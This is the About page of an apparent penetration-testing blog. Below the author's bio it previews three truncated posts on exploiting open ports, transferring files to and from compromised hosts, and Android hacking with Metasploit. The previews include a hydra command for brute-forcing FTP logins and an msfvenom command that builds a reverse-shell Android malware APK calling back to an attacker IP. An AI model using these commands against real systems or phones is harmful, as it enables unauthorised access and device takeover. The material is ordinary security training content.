Skip to main content

About


Hi!! 

I am Laxminarayan Dash (1nput1s3vil) completed M.Tech (Information Technology) and B.Tech (Electronics and Telecommunication). I am a Certified Ethical Hacker and Cyber Crime Intervention Officer. 

Now I am working as freelancer as a Penetration Tester and managing Cyber Security Solutions. My Security testing services addresses mission-critical security challenges faced by enterprises. 

Popular posts from this blog

Exploiting All Ports in Different Techniques

In this section we will exploit the active ports in different techniques. The ports we are trying to exploit are FTP, SSH, TELNET, SMTP, NETBIOS-SSN, JAVA RMI, BINDSHELL, ProFTPD, MYSQL, DISTCCD, VNC, X11, UnrealIRCD, TOMCAT, RUBY-DRB. 1.  21-FTP Method 1: Login with Anonymous as username and no password. If you need more info about Anonymous FTP you can find it here. https://whatis.techtarget.com/definition/anonymous-FTP-File-Transfer-Protocol ftp 192.168.0.130     Method 2 : Through Brute-force using Hydra but you need to have a custom list of usernames and passwords. hydra -L /root/Desktop/USERNAMES.txt -P /root/Desktop/PASSWORDS.txt <Target IP Address> ftp -V     It will take each username and password from the given files and try to login to the target FTP service. Once you found the credentials you can directly log in.     After log ging in  to a user account, You can get root access by doing Privilege escalation. Method 3 : Exploiting...

Files Transferring Techniques

        Often I struggled to transfer files from Host to Attacker and Attacker to Host.Sometimes i forget the commands and techniques that I learned before.So i am making notes of this to refer in future.We can easily downloads files from web server using browser..but what about command line.         File Transfer is a pain, and in most cases,After gaining initial access on the target machine, and with file transfers, we can upload tools and exploits on the target to try and elevate the privileges, exfiltrate sensitive data from the target back to your machine or just move around files to/from the target and you . Linux(Setting up the server's) 1.Apache We can serve files using apache server,but i love using python modules instead of apache server. Because first we need to move files into   /var/www/html   directory,then we need to start  Apache  server.          ...

Android Hacking With Metasploit

Hello This is my first blog regarding the android hacking with metasploit. I am in the learning stage and if you found some error then point out them and feel free to contact me. Step 1:- First of all we have to open terminal and start some services with commands like:-                                          (a) start apache2 start                                          (b) start postgresql start Then we have to start metasploit framework with the command msfconsole. Step 2:- Then we have to create android malware using metasploit framework in new window. Execute the Command:- msfvenom -p android/meterpreter/reverse_tcp LHOST= <attacker IP> LPORT= <attacker PORT> R > <filename.apk> N.B:- msfvenom is a command line code t...